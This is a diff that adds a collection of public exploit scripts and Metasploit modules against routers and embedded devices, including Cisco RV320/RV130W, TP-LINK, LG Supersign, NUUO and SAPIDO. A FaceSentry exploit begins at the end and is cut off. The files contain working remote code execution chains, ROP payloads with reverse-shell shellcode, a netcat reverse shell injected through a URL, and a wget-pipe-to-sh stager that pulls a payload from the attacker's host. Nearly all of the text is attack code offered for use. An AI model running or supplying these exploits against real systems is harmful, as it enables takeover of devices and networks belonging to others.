+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
+
+
+06.09.2019
+
+--
+
+
+# cat /etc/passwd
+root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:administrator:/:/bin/sh
+nobody:*:254:254:nobody:/var/empty:/bin/sh
+logout:gfr8cijmRSDck:498:506:logout:/:
+
+# john --show /etc/passwd 
+root:pass:0:0:administrator:/:/bin/sh
+logout:logout:498:506:logout:/:
+
+2 password hashes cracked, 0 left
\ No newline at end of file
diff --git a/exploits/hardware/remote/46655.rb b/exploits/hardware/remote/46655.rb
new file mode 100755
index 000000000..77d1e5bf3
--- /dev/null
+++ b/exploits/hardware/remote/46655.rb
@@ -0,0 +1,207 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Cisco RV320 and RV325 Unauthenticated Remote Code Execution",
+      'Description'    => %q{
+        This exploit module combines an information disclosure (CVE-2019-1653)
+        and a command injection vulnerability (CVE-2019-1652) together to gain
+        unauthenticated remote code execution on Cisco RV320 and RV325 small business
+        routers. Can be exploited via the WAN interface of the router. Either via HTTPS
+        on port 443 or HTTP on port 8007 on some older firmware versions.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'RedTeam Pentesting GmbH', # Discovery, Metasploit
+        'Philip Huppert',          # Discovery
+        'Benjamin Grap'            # Metasploit
+      ],
+      'References'     => [
+          [ 'CVE','2019-1653' ],
+          [ 'CVE','2019-1652' ],
+          [ 'EDB','46243' ],
+          [ 'BID','106728' ],
+          [ 'BID','106732' ],
+          [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],
+          [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]
+      ],
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+         [ 'LINUX MIPS64',
+          {
+           'Platform' => 'linux',
+           'Arch'     => ARCH_MIPS64
+          }
+         ]
+        ],
+      'Payload'        =>
+        {
+         'BadChars' => ""
+        },
+      'CmdStagerFlavor' => [ 'bourne' ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Sep 9 2018",
+      'DefaultTarget'  => 0))
+
+    register_options([
+      Opt::RPORT(8007), # port of Cisco webinterface
+      OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
+      OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),
+      OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.
+    ])
+    deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.
+    deregister_options('SSLCert') # not required since stager only uses HTTP.
+  end
+
+  def execute_command(cmd, opts = {})
+    # use generated payload, we don't have to do anything here
+  end
+
+  def autofilter
+    true
+  end
+
+  def on_request_uri(cli, req)
+    print_status("#{peer} - Payload request received: #{req.uri}")
+    @cmdstager = generate_cmdstager().join(';')
+    send_response(cli, "#{@cmdstager}")
+  end
+
+  def primer
+    payload_url = get_uri
+    print_status("Downloading configuration from #{peer}")
+    if(datastore['USE_SSL'])
+      print_status("Using SSL connection to router.")
+    end
+    res = send_request_cgi({
+      'uri' => normalize_uri("cgi-bin","config.exp"),
+      'SSL' => datastore['USE_SSL']
+    })
+    unless res
+      vprint_error('Connection failed.')
+      return nil
+    end
+
+    unless res.code == 200
+      vprint_error('Could not download config. Aborting.')
+      return nil
+    end
+
+    print_status("Successfully downloaded config")
+    username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]
+    pass = res.body.match(/^PASSWD=(\h+)/)[1]
+    authkey = "1964300002"
+    print_status("Got MD5-Hash: #{pass}")
+    print_status("Loging in as user #{username} using password hash.")
+    print_status("Using default auth_key #{authkey}")
+    res2 = send_request_cgi({
+      'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
+      'SSL' => datastore['USE_SSL'],
+      'method' => 'POST',
+      'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
+    })
+
+    unless res
+      vprint_error('Connection failed during login. Aborting.')
+      return nil
+    end
+
+    unless res.code == 200
+      vprint_error('Login failed with downloaded credentials. Aborting.')
+      return nil
+    end
+
+    #Extract authentication cookies
+    cookies = res2.get_cookies()
+    print_status("Successfully logged in as user #{username}.")
+    print_status("Got cookies: #{cookies}")
+    print_status("Sending payload. Staging via #{payload_url}.")
+    #Build staging command
+    command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
+    if(command_string.length <= 63)
+      print_status("Staging command length looks good. Sending exploit!")
+    else
+      vprint_error("Warning: Staging command length probably too long. Trying anyway...")
+    end
+
+    res3 = send_request_cgi({
+      'uri' => normalize_uri("certificate_handle2.htm"),
+      'SSL' => datastore['USE_SSL'],
+      'method' => 'POST',
+      'cookie' => cookies,
+        'vars_get' => {
+         'type' => '4',
+        },
+        'vars_post' => {
+          'page' => 'self_generator.htm',
+                    'totalRules' => '1',
+                    'OpenVPNRules' => '30',
+                    'submitStatus' => '1',
+                    'log_ch' => '1',
+                    'type' => '4',
+                    'Country' => 'A',
+                    'state' => 'A',
+                    'locality' => 'A',
+                    'organization' => 'A',
+                    'organization_unit' => 'A',
+                    'email' => 'any@example.com',
+                    'KeySize' => '512',
+                    'KeyLength' => '1024',
+                    'valid_days' => '30',
+                    'SelectSubject_c' => '1',
+                    'SelectSubject_s' => '1'
+        },
+        'data' => "common_name=#{command_string}"
+    })
+    unless res3
+      vprint_error('Connection failed while sending command. Aborting.')
+      return nil
+    end
+
+    unless res3.code == 200
+      vprint_error('Sending command not successful.')
+      return nil
+    end
+    print_status("Sending payload timed out. Waiting for stager to connect...")
+  end
+
+  def check
+    #Check if device is vulnerable by downloading the config
+    res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")})
+
+    unless res
+      vprint_error('Connection failed.')
+      return CheckCode::Unknown
+    end
+
+    unless res.code == 200
+      return CheckCode::Safe
+    end
+
+    unless res.body =~ /PASSWD/
+      return CheckCode::Detected
+    end
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    # Main function.
+    # Setting delay for the Stager.
+    Timeout.timeout(datastore['HTTPDELAY']) {super}
+  rescue Timeout::Error
+    print_status("Waiting for stager connection timed out. Try increasing the delay.")
+  end
+end
\ No newline at end of file
diff --git a/exploits/hardware/remote/46678.py b/exploits/hardware/remote/46678.py
new file mode 100755
index 000000000..17f84f275
--- /dev/null
+++ b/exploits/hardware/remote/46678.py
@@ -0,0 +1,139 @@
+#Author Grzegorz Wypych - h0rac
+# TP-LINK TL-WR940N/TL-WR941ND buffer overflow remote shell exploit
+
+import requests
+import md5
+import base64
+import string
+import struct
+import socket
+
+password = md5.new('admin').hexdigest()
+cookie = base64.b64encode('admin:'+password)
+
+print '[+] Authorization cookie: ', cookie
+print '[+] Login to generate user directory...'
+#proxy = {'http':'127.0.0.1:8080'}
+
+loginUrl = 'http://192.168.0.1/userRpm/LoginRpm.htm?Save=Save'
+headers = {'cookie':'Authorization=Basic%20'+cookie.replace('=', '%3D')}
+req = requests.get(loginUrl, headers=headers)
+directory = ''
+
+nop = "\x27\xE0\xFF\xFF"
+
+shellcode = string.join([
+		"\x24\x0f\xff\xfa", # li	t7,-6
+		"\x01\xe0\x78\x27", # nor	t7,t7,zero
+		"\x21\xe4\xff\xfd", # addi	a0,t7,-3
+		"\x21\xe5\xff\xfd", # addi	a1,t7,-3
+		"\x28\x06\xff\xff", # slti	a2,zero,-1
+		"\x24\x02\x10\x57", # li	v0,4183
+		"\x01\x01\x01\x0c", # syscall	0x40404
+		"\xaf\xa2\xff\xff", # sw	v0,-1(sp)
+		"\x8f\xa4\xff\xff", # lw	a0,-1(sp)
+		"\x34\x0f\xff\xfd", # li	t7,0xfffd
+		"\x01\xe0\x78\x27", # nor	t7,t7,zero
+		"\xaf\xaf\xff\xe0", # sw	t7,-32(sp)
+		"\x3c\x0e\x1f\x90", # lui	t6,0x1f90
+		"\x35\xce\x1f\x90", # ori	t6,t6,0x1f90
+		"\xaf\xae\xff\xe4", # sw	t6,-28(sp)
+
+		# Big endian IP address 172.28.128.4
+                "\x3c\x0e\xc0\xA8"  # lui       t6,0x7f01
+		#"\xac\x1c\x80\x04", # lui	t6,0x7f01
+		"\x35\xce\x01\x64", # ori	t6,t6,0x101
+
+		"\xaf\xae\xff\xe6", # sw	t6,-26(sp)
+		"\x27\xa5\xff\xe2", # addiu	a1,sp,-30
+		"\x24\x0c\xff\xef", # li	t4,-17
+		"\x01\x80\x30\x27", # nor	a2,t4,zero
+		"\x24\x02\x10\x4a", # li	v0,4170
+		"\x01\x01\x01\x0c", # syscall	0x40404
+		"\x24\x0f\xff\xfd", # li	t7,-3
+		"\x01\xe0\x78\x27", # nor	t7,t7,zero
+		"\x8f\xa4\xff\xff", # lw	a0,-1(sp)
+		"\x01\xe0\x28\x21", # move	a1,t7
+		"\x24\x02\x0f\xdf", # li	v0,4063
+		"\x01\x01\x01\x0c", # syscall	0x40404
+		"\x24\x10\xff\xff", # li	s0,-1
+		"\x21\xef\xff\xff", # addi	t7,t7,-1
+		"\x15\xf0\xff\xfa", # bne	t7,s0,68 <dup2_loop>
+		"\x28\x06\xff\xff", # slti	a2,zero,-1
+		"\x3c\x0f\x2f\x2f", # lui	t7,0x2f2f
+		"\x35\xef\x62\x69", # ori	t7,t7,0x6269
+		"\xaf\xaf\xff\xec", # sw	t7,-20(sp)
+		"\x3c\x0e\x6e\x2f", # lui	t6,0x6e2f
+		"\x35\xce\x73\x68", # ori	t6,t6,0x7368
+		"\xaf\xae\xff\xf0", # sw	t6,-16(sp)
+		"\xaf\xa0\xff\xf4", # sw	zero,-12(sp)
+		"\x27\xa4\xff\xec", # addiu	a0,sp,-20
+		"\xaf\xa4\xff\xf8", # sw	a0,-8(sp)
+		"\xaf\xa0\xff\xfc", # sw	zero,-4(sp)
+		"\x27\xa5\xff\xf8", # addiu	a1,sp,-8
+		"\x24\x02\x0f\xab", # li	v0,4011
+		"\x01\x01\x01\x0c"  # syscall	0x40404
+            ], '')
+
+libcBase= 0x77f53000
+sleep = libcBase + 0x53CA0
+gadget1 = libcBase + 0x00055c60 # addiu $a0, $zero, 1; move $t9, $s1; jalr $t9;
+gadget2 = libcBase + 0x00024ecc #lw $ra, 0x2c($sp); lw $s1, 0x28($sp); lw $s0, 0x24($sp); jr $ra;
+gadget3 = libcBase + 0x0001e20c # move $t9, $s1; lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $t9
+gadget4 = libcBase + 0x000195f4 #addiu $s0, $sp, 0x24; move $a0, $s0; move $t9, $s1; jalr $t9; 
+gadget5 = libcBase + 0x000154d8 # #move $t9, $s0; jalr $t9; 
+
+
+print "[+] First gadget address: ", hex(gadget1)
+print "[+] Second gadget address: ", hex(gadget2) 
+print "[+] Third gadget address: ", hex(gadget3)
+print "[+] Fourth gadget address: ", hex(gadget4)
+print "[+] Fifth gadget address: ", hex(gadget4)
+print "[+] Sleep function address: ", hex(sleep)  
+payload = "A"*160
+s0 = "BBBB"
+s1 = gadget2
+payload += s0
+payload += struct.pack('>I', s1)
+payload += struct.pack('>I', gadget1) #Overwrite RA address
+#New stack for gadget 2 starts
+payload += "E" * 20 # adjust stack
+payload += "FFFF" #gadget3 -> lw $s0, 0x18($sp) => 24 bytes
+payload += "GGGG" #gadget3 -> lw $s1, 0x1c($sp) => 28 bytes
+payload += "HHHH" #gadget3 -> lw $s2, 0x20($sp) => 32 bytes
+payload += "AAAA"
+payload += "CCCC"
+payload += struct.pack('>I', sleep) #gadget2 -> lw $s1, 0x28($sp) => 40 bytes
+payload += struct.pack('>I', gadget3) #gadget2 -> lw $ra, 0x2c($sp) => 44 bytes
+#New stack for gadget 3 starts
+payload += "G" *24
+payload += "A"* 4 #lw $s0, 0x18($sp); sp + 24 bytes = s0
+payload += struct.pack('>I', gadget5)#lw $s1, 0x1c($sp); sp + 28 bytes = s1 <= load gadget 5 addr
+payload += "C" *4 #lw $s2, 0x20($sp); sp + 32 bytes = s2
+payload += struct.pack('>I', gadget4) #lw $ra, 0x24($sp); sp + 36 bytes = ra <= load gadget 4 addr
+#New stack for gadget 4 starts
+payload += nop * 32  
+payload += shellcode #addiu $s0, $sp, 0x24; sp + 36 bytes = s0
+
+if(req.status_code):
+    directory = req.text.split('=')[2].split('/')[3]
+    print '[+] Retrieved folder name: ', directory
+    req.close() 
+    referer ='http://192.168.0.1/{0}/userRpm/DiagnosticRpm.htm'.format(directory)
+  
+    host = '192.168.0.1'
+    port = 80
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    print "[*] Connected, sending payload {0} bytes...".format(len(payload))
+    pingUrl = '{1}/userRpm/PingIframeRpm.htm'.format(host,directory)
+    pingUrl += '?ping_addr='+payload+'&doType=ping&isNew=new&sendNum=4&psize=64&overTime=800&trHops=20'
+    auth = 'Authorization=Basic%20'+cookie.replace('=', '%3D')
+    pingReq = "GET /{0} HTTP/1.1\r\nHost: {1}\r\nReferer: {2}\r\ncookie: {3}\r\n\r\n".format(pingUrl, host, referer, auth)
+    print "[+] Exploit request: {0}".format(pingReq)
+    s.send(pingReq)
+    s.recv(4096)
+    s.close()
+else:
+    req.close()
\ No newline at end of file
diff --git a/exploits/hardware/remote/46705.rb b/exploits/hardware/remote/46705.rb
new file mode 100755
index 000000000..273813c18
--- /dev/null
+++ b/exploits/hardware/remote/46705.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# linux/armle/meterpreter/bind_tcp -> segfault
+# linux/armle/meterpreter/reverse_tcp -> segfault
+# linux/armle/meterpreter_reverse_http -> works
+# linux/armle/meterpreter_reverse_https -> works
+# linux/armle/meterpreter_reverse_tcp -> works
+# linux/armle/shell/bind_tcp -> segfault
+# linux/armle/shell/reverse_tcp -> segfault
+# linux/armle/shell_bind_tcp -> segfault
+# linux/armle/shell_reverse_tcp -> segfault
+#
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Cisco RV130W Routers Management Interface Remote Command Execution',
+      'Description'    => %q{
+        A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router
+         could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+         The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
+         An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+         A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+          system of the affected device as a high-privilege user.
+
+        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+        Note: successful exploitation may not result in a session, and as such,
+         on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
+      },
+      'Author'         =>
+        [
+          'Yu Zhang', # Initial discovery
+          'Haoliang Lu', # Initial discovery
+          'T. Shiomitsu', # Initial discovery
+          'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
+        ],
+      'License'         => MSF_LICENSE,
+      'Platform'        =>  %w[linux],
+      'Arch'            =>  [ARCH_ARMLE],
+      'SessionTypes'    =>  %w[meterpreter],
+      'CmdStagerFlavor' => %w{ wget },
+      'Privileged'      => true, # BusyBox
+      'References'      =>
+        [
+          ['CVE', '2019-1663'],
+          ['BID', '107185'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
+        ],
+      'DefaultOptions' => {
+          'WfsDelay' => 10,
+          'SSL' => true,
+          'RPORT' => 443,
+          'CMDSTAGER::FLAVOR' => 'wget',
+          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+       },
+      'Targets'        =>
+        [
+          [ 'Cisco RV130/RV130W < 1.0.3.45',
+            {
+              'offset'          => 446,
+              'libc_base_addr'  => 0x357fb000,
+              'system_offset'   => 0x0004d144,
+              'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
+              'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
+              'Arch'            => ARCH_ARMLE,
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Feb 27 2019',
+      'DefaultTarget'   => 0,
+      'Notes' => {
+        'Stability'   => [ CRASH_SERVICE_DOWN, ],
+      },
+    ))
+  end
+
+  def p(offset)
+    [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
+  end
+
+  def prepare_shellcode(cmd)
+    #All these gadgets are from /lib/libc.so.0
+    shellcode = rand_text_alpha(target['offset']) +       # filler
+      p(target['gadget1']) +
+      p(target['system_offset']) +                        # r2
+      rand_text_alpha(4) +                                # r6
+      p(target['gadget2']) +                              # pc
+      cmd
+    shellcode
+  end
+
+  def send_request(buffer)
+    begin
+      send_request_cgi({
+        'uri'     => '/login.cgi',
+        'method'  => 'POST',
+        'vars_post' => {
+              "submit_button": "login",
+              "submit_type": "",
+              "gui_action": "",
+              "wait_time": 0,
+              "change_action": "",
+              "enc": 1,
+              "user": rand_text_alpha_lower(5),
+              "pwd": buffer,
+              "sel_lang": "EN"
+          }
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
+    end
+  end
+
+  def exploit
+    print_status('Sending request')
+    execute_cmdstager
+  end
+
+  def execute_command(cmd, opts = {})
+    shellcode = prepare_shellcode(cmd.to_s)
+    send_request(shellcode)
+  end
+
+  def on_new_session(session)
+    # Given there is no process continuation here, the httpd server will stop
+    # functioning properly and we need to take care of proper restart
+    # ourselves.
+    print_status("Reloading httpd service")
+    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
+    if session.type.to_s.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
+    else
+      session.shell_command(reload_httpd_service)
+    end
+  ensure
+    super
+  end
+end
\ No newline at end of file
diff --git a/exploits/hardware/remote/46795.rb b/exploits/hardware/remote/46795.rb
new file mode 100755
index 000000000..a33952033
--- /dev/null
+++ b/exploits/hardware/remote/46795.rb
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+        'Name'        => 'LG Supersign EZ CMS RCE',
+        'Description' => %q{
+            		  LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone
+                          to remote code execution due to an improper parameter handling
+        },
+        'Author'      => ['Alejandro Fanjul'],
+        'References'  =>
+          [
+            [ 'CVE', '2018-17173' ],
+            [ 'URL', 'https://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => 'unix',
+        'Privileged'     => false,
+        'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'cmd/unix/reverse_netcat'
+          },
+        'Arch'           => ARCH_CMD,
+        'Payload'        =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'netcat'
+              }
+          },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Sep 21 2018'
+      )
+     )
+     register_options(
+      [
+         OptString.new('RPORT',[true,'Target port','9080'])
+      ], self.class)
+
+  end
+
+
+  def exploit
+    lhost=datastore['LHOST']
+    lport=datastore['LPORT']
+    #uri = target_uri.path
+    cmd = Rex::Text.uri_encode(payload.encoded)
+    connect
+    res = send_request_raw({
+        'method'=>'GET',
+        'uri'=>"/qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20"+lhost+"%20"+lport.to_s+"%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150"
+        
+    })    
+    handler
+    disconnect
+
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/hardware/remote/46960.py b/exploits/hardware/remote/46960.py
new file mode 100755
index 000000000..def3ea743
--- /dev/null
+++ b/exploits/hardware/remote/46960.py
@@ -0,0 +1,89 @@
+#!/usr/bin/python
+# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
+# Google Dork: n/a
+# Date: Advisory Published: Nov 18
+# Exploit Author: @0x00string
+# Vendor Homepage: nuuo.com
+# Software Link: https://www.nuuo.com/ProductNode.php?node=2
+# Version: 3.9.1 and prior
+# Tested on: 3.9.1
+# CVE : CVE-2018-19864
+#
+#   [ leading / ]
+#   [ Padding x 335 ]
+#   [ original value at stack pointer + 158 ]
+#   [ padding x 80 ]
+#   [ address of (pop {r3,lr} ; bx lr) ]
+#   [ system() address ]
+#   [ address of (mov r0,sp ; blx r3) ]
+#   [ command to execute ]
+
+def banner():
+    print '''
+              @0x00string
+             0000000000000
+          0000000000000000000   00
+       00000000000000000000000000000
+      0000000000000000000000000000000
+    000000000             0000000000
+   00000000               0000000000
+  0000000                000000000000
+ 0000000               000000000000000
+ 000000              000000000  000000
+0000000            000000000     000000
+000000            000000000      000000
+000000          000000000        000000
+000000         00000000          000000
+000000       000000000           000000
+0000000    000000000            0000000
+ 000000   000000000             000000
+ 0000000000000000              0000000
+  0000000000000               0000000
+   00000000000              00000000
+   00000000000            000000000
+  0000000000000000000000000000000
+   00000000000000000000000000000
+     000  0000000000000000000
+             0000000000000
+https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
+'''
+
+def usage ():
+    print   ("python script.py <args>\n"
+            "   -h, --help:             Show this message\n"
+            "   -a, --rhost:            Target IP address\n"
+            "   -b, --rport:            Target Port - default 5150\n"
+            "   -c, --command:          Command to execute\n"
+            "\n"
+            "Example:\n"
+            "python script.py -a 10.10.10.10\n"
+            "python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
+    exit()
+
+def main():
+    rhost = None;
+    rport = "5150";
+    command = "{/bin/touch,/tmp/hax}"
+    banner()
+    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help'])
+    for opt, arg in options:
+        if opt in ('-h', '--help'):
+            usage()
+        elif opt in ('-a','--rhost'):
+            rhost = arg;
+        elif opt in ('-b','--rport'):
+            rport = arg;
+        elif opt in ('-c','--command'):
+            command = arg;
+    print ("Sending exploit to execute [" + command + "]\n")
+    buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" +
+    "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " +
+    "http://" + rhost + ":" + rport + "\r\n\r\n"
+    sock = socket(AF_INET, SOCK_STREAM)
+    sock.settimeout(30)
+    sock.connect((target_ip,int(target_port)))
+    sock.send(buf)
+    print ("done\n")
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/hardware/remote/46961.py b/exploits/hardware/remote/46961.py
new file mode 100755
index 000000000..0297a21ef
--- /dev/null
+++ b/exploits/hardware/remote/46961.py
@@ -0,0 +1,68 @@
+#!/usr/bin/python
+# Exploit Title: Cisco RV130W Remote Stack Overflow
+# Google Dork: n/a
+# Date: Advisory Published: Feb 2019
+# Exploit Author: @0x00string
+# Vendor Homepage: cisco.com
+# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
+# Version: 1.0.3.44 and prior
+# Tested on: 1.0.3.44
+# CVE : CVE-2019-1663
+#
+# 0x357fc000 - libc base addr
+# 0x35849144 - system() addr
+# 
+# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
+# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}; 
+# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
+# 
+#   gadget 1    system()   junk   gadget 2   junk  junk  junk  junk  junk   gadget 3    text
+# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
+#
+# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'
+
+#!/usr/bin/python
+import requests
+
+def banner():
+    print '''
+              @0x00string
+             0000000000000
+          0000000000000000000   00
+       00000000000000000000000000000
+      0000000000000000000000000000000
+    000000000             0000000000
+   00000000               0000000000
+  0000000                000000000000
+ 0000000               000000000000000
+ 000000              000000000  000000
+0000000            000000000     000000
+000000            000000000      000000
+000000          000000000        000000
+000000         00000000          000000
+000000       000000000           000000
+0000000    000000000            0000000
+ 000000   000000000             000000
+ 0000000000000000              0000000
+  0000000000000               0000000
+   00000000000              00000000
+   00000000000            000000000
+  0000000000000000000000000000000
+   00000000000000000000000000000
+     000  0000000000000000000
+             0000000000000
+https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
+'''
+
+def main():
+    banner()
+    command = "ping 192.168.1.100\x00"
+    print ("Sending exploit to execute [" + command + "]\n")
+    rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"
+    payload = ("Z" * 446) + rop + command
+    url = "https://192.168.1.100:443/login.cgi"
+    data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}
+    r = requests.post(url, payload=data)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/hardware/remote/47031.py b/exploits/hardware/remote/47031.py
new file mode 100755
index 000000000..34e7f2999
--- /dev/null
+++ b/exploits/hardware/remote/47031.py
@@ -0,0 +1,22 @@
+# Exploit Title: SAPIDO RB-1732 command line execution
+# Date: 2019-6-24
+# Exploit Author: k1nm3n.aotoi
+# Vendor Homepage: http://www.sapido.com.tw/
+# Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin
+# Version: RB-1732 V2.0.43 
+# Tested on: linux
+
+ 
+import requests
+import sys
+ 
+def test_httpcommand(ip, command):
+   my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
+   r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)
+   content = r.text
+   content = content[
+     content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:
+     content.rfind('</textarea>')]
+   return content
+ 
+print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))
\ No newline at end of file
diff --git a/exploits/hardware/remote/47067.py b/exploits/hardware/remote/47067.py
new file mode 100755
index 000000000..11c8b9fcc
--- /dev/null
+++ b/exploits/hardware/remote/47067.py
@@ -0,0 +1,108 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+#
+# FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit
+#
+#
+# Vendor: iWT Ltd.
+# Product web page: http://www.iwt.com.hk
+# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
+#                   Firmware 5.7.2 build 568 (Algorithm A14)
+#                   Firmware 5.7.0 build 539 (Algorithm A14)
+#
+# Summary: FaceSentry 5AN is a revolutionary smart identity
+# management appliance that offers entry via biometric face
+# identification, contactless smart card, staff ID, or QR-code.
+# The QR-code upgrade allows you to share an eKey with guests
